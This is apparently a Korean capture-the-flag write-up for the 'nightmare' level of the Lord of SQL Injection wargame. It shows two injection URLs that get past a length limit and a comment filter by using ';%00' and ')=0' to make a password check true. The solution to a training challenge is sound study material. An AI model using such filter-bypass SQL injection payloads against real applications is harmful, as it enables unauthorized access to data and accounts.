cgy12306
[LOS] nightmare 본문
GET으로 받아온 pw가 6글자 이상이면 안된다. 또 #과 -이 preg_match로 막혀있기 때문에 주석처리도 안된다.
대범이 형이 힌트를 줬다. 다른 주석 사용법이 있다.
;%00으로 해주게 되면 모든 쿼리문을 작성하고 ;으로 닫고 뒤에 NULL값 처리를 해서 아무것도 없게 처리를 해준다.
https://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php?pw=');%00
잘 먹힌것 같지만 pw에는 거짓값이 들어가 있기 때문에 참값으로 만들어 줘야 한다.
false는 0이기 때문에 =0, <1로 해주면 참으로 처리된다. 한번 해보자.
https://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php?pw=%27)=0;%00
'Wargame > LOS' 카테고리의 다른 글
[LOS] dragon (0) | 2019.09.07 |
---|---|
[LOS] xavis (0) | 2019.09.07 |
[LOS] succubus (0) | 2019.08.30 |
[LOS] zombie_assassin (0) | 2019.08.30 |
[LOS] assassin (0) | 2019.08.23 |
Comments